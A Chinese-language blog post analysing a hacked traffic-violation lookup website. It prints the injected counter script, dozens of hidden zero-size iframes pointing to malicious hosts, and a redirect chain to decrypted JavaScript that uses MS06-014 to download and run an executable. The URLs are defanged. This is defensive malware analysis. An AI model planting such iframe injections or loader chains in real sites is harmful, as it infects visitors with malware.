AI 助理
备案控制台
开发者社区 安全 文章 正文

某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等

2024-09-28 41
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等

问题出在该网页所用的计数器代码上:

/---
<script src="hxxp://www.h*c**jj***d.com/wfcx/count/online.asp"></script>
---/

看看hxxp://www.h*c**jj***d.com/wfcx/count/online.asp 的代码:

/---
<iframe src=hxxp://user*.free.77**16*9.net/%73%61%74%61%6E%6C%73%78/sa.htm width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/bzsiyu/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/bzsiyu/index.htm" width=100 height=0></iframe><iframe src="hxxp://hack**t*ao.q**yun.net/" width=100 height=0></iframe>
<iframe src=hxxp://w**.7***373*4.cn/reg.htm?a width=100 height=0 frameborder=0></iframe><iframe src="hxxp://c*.th*e**c.cn/hacktao/" width=100 height=0></iframe>
<iframe src="hxxp://M**.thIe**c.cn/siyua/" width=100 height=0></iframe>
<iframe src="hxxp://M**.thIe**c.cn/siyua/" width=0 height=0></iframe>
<iframe src="hxxp://b**zsiyua*.5***12j.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/1.htm" width=0 height=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.com.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/muma/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.n*8*585**3.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/gogo/index.htm width=0 height=0></iframe><iframe src=hxxp://www.m**8*585**3.com.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/muma/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.n*8*585**3.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/gogo/index.htm width=0 height=0></iframe><iframe  width=0 height=0></iframe><iframe  width=0 height=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://w**.m**h*88***88.cn/ad.htm?a width=100 height=0 frameborder=0></iframe>
<iframe src=hxxp://w**.7***373*4.cn/reg.htm?a width=100 height=0 frameborder=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe  height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://www.8***8o*u.cn/index.htm height=0 width=0></iframe><iframe src=hxxp://www.8***8o*u.cn/index.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://userI.free**2.7**716*9.net/siyua/" width=0 height=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://userI.free**2.7**716*9.net/siyua/" width=0 height=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe>
document.write("<a href=hxxp://www.h*c**jj***d.com/wfcx/count/ShowOnline.asp title=查看当前在线人数列表><font color=red>当前在线<strong>1</strong>人</font></a>")
---/

挂的东东还真多~

随便找了 hxxp://w**.7***373*4.cn/reg.htm?a 来分析。代码为:

/---
<iframe src=dog.htm width=1 height=0></iframe>
<script src=haha.js></script>
<script src='hxxp://s*89.cnzz.com/stat.php?id=5*372*23&web_id=5*372*23&show=pic2' language='JavaScript' charset='gb2312'></script>
---/
hxxp://w**.7***373*4.cn/dog.htm 的内容为:
/---
<iframe src=hxxp://a*a.1***8d*d.net/ww/new04.htm?xinjiang width=0 height=0></iframe
---/
hxxp://a*a.1***8d*d.net/ww/new04.htm?xinjiang 的内容为:
/---
<iframe width='0' height='0' src='hxxp://a*a.1***8d*d.net/aa/kl.htm'></iframe>
<script language="javascript" type="text/javascript" src="hxxp://js.users.51.la/12**996*44.js"></script>
---/

hxxp://a*a.1***8d*d.net/aa/kl.htm 的内容为加密的JavaScript代码,经2次解密,得到原始代码,功能是若不存在Cookies变量OK,则创建,并引入漏洞利用代码:

/---
<script src=hxxp:a*a.1***8d*d.net//aa//1.js><//script>
<script src=hxxp:a*a.1***8d*d.net//aa//b.js><//script><script src=hxxp:a*a.1***8d*d.net//aa//pps.js><//script>
---/

并下载 hxxp://down**.1***8d*dI*.net/bb/bd.cab

hxxp://a*a.1***8d*d.net/aa/1.js 功能是利用 MS06014漏洞下载hxxp://down**.1***8d*dI*.net/bb/014.exe,保存为ntuser.com,利用cmd.exe来运行。


文章标签:
安全
JavaScript
前端开发
数据安全/隐私保护
游客qeoynko2nmbgk
目录
相关文章
游客qeoynko2nmbgk
|
3月前
|
安全 数据安全/隐私保护
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
游客qeoynko2nmbgk
38 1
游客qeoynko2nmbgk
|
3月前
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
游客qeoynko2nmbgk
27 1
游客qeoynko2nmbgk
|
3月前
|
安全 Windows
【原创】借助瑞星在线查毒解决Trojan.DL.GPigeon.a和Exploit.HTML.Mht
【原创】借助瑞星在线查毒解决Trojan.DL.GPigeon.a和Exploit.HTML.Mht
游客qeoynko2nmbgk
31 1
游客qeoynko2nmbgk
|
3月前
|
安全 数据安全/隐私保护
某论坛挂马Worm.Win32.Autorun.eyh
某论坛挂马Worm.Win32.Autorun.eyh
游客qeoynko2nmbgk
20 1
游客qeoynko2nmbgk
|
3月前
|
安全 网络性能优化 Windows
遭遇万能搜索(WANSO,RootKit.Agent.sa,Trojan.AdPlayer.a)、kuzhan等N多病毒
遭遇万能搜索(WANSO,RootKit.Agent.sa,Trojan.AdPlayer.a)、kuzhan等N多病毒
游客qeoynko2nmbgk
40 0
游客qeoynko2nmbgk
|
3月前
|
移动开发 监控 安全
03-31/某博客网的rss2.asp力推5病毒(其中3个为灰鸽子)第3版
03-31/某博客网的rss2.asp力推5病毒(其中3个为灰鸽子)第3版
游客qeoynko2nmbgk
40 0
游客qeoynko2nmbgk
|
3月前
|
安全 JavaScript 前端开发
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
游客qeoynko2nmbgk
33 0
游客qeoynko2nmbgk
|
3月前
|
JavaScript 前端开发
某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等
某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等
游客qeoynko2nmbgk
36 0
游客qeoynko2nmbgk
|
3月前
|
安全
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
游客qeoynko2nmbgk
21 0
狼人2007
|
Web App开发 安全
MSN、易趣、大旗被挂马 用户浏览后感染机器狗病毒
据瑞星“云安全”系统监测,4月22日,“MSN中国读报频道(与方正阿帕比合建)”、“大旗网”、“易趣品质网购店”等被黑客挂马,用户浏览这些网站后,会被植入两个盗号木马:Trojan.Win32.Edog.bv(机器狗)和Trojan.Win32.Killav.azz(AV终结者),这个木马会强行关闭电脑中的杀毒软件,窃取用户的帐号密码等个人资料。
狼人2007
1115 0

热门文章

最新文章

  • 1
    跟阿里云技术专家阙寒一起深度了解视频直播CDN技术
  • 2
    流批一体的近实时数仓的思考与设计
  • 3
    丰富、连接、待集成—MaxCompute 生态再出发
  • 4
    securecrt克隆会话与sshd 的 MaxSessions
  • 5
    Flink 消息聚合处理方案
  • 6
    VMware安装的相关文章
  • 7
    forever让nodejs应用后台执行
  • 8
    路边的烧烤摊杂感
  • 9
    size_type、size_t、differentce_type以及ptrdiff_t
  • 10
    一些链接
  • 1
    【claude官网中文版】国内如何使用claude?记住这十大技巧!
    93
  • 2
    调用云端Qwen系列大模型(TURBO、PLUS、MAX和MAX_LATEST)在国际商业咨询智能体场景的实践探索
    48
  • 3
    已解决:国内如何使用Claude 3.5 Sonnet \ claude官网中文入口
    41
  • 4
    HarmonyOS 5.0 Next实战应用开发—‘我的家乡’【HarmonyOS Next华为公司完全自研的操作系统】
    64
  • 5
    自学记录鸿蒙API 13:实现多目标识别Object Detection
    157
  • 6
    《探索人工智能产业的可持续发展模式与策略》
    18
  • 7
    《人工智能助力社会学研究:数据挖掘与分析方法的深度探索》
    20
  • 8
    《软体机器人与仿生机器人的人工智能控制技术:挑战与突破》
    17
  • 9
    《探索机器人自主导航与路径规划技术的热点》
    20
  • 10
    《集成学习:堆叠泛化与提升法在人工智能中的应用热点》
    16

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    手把手教你白嫖阿里云服务器(免费领服务器)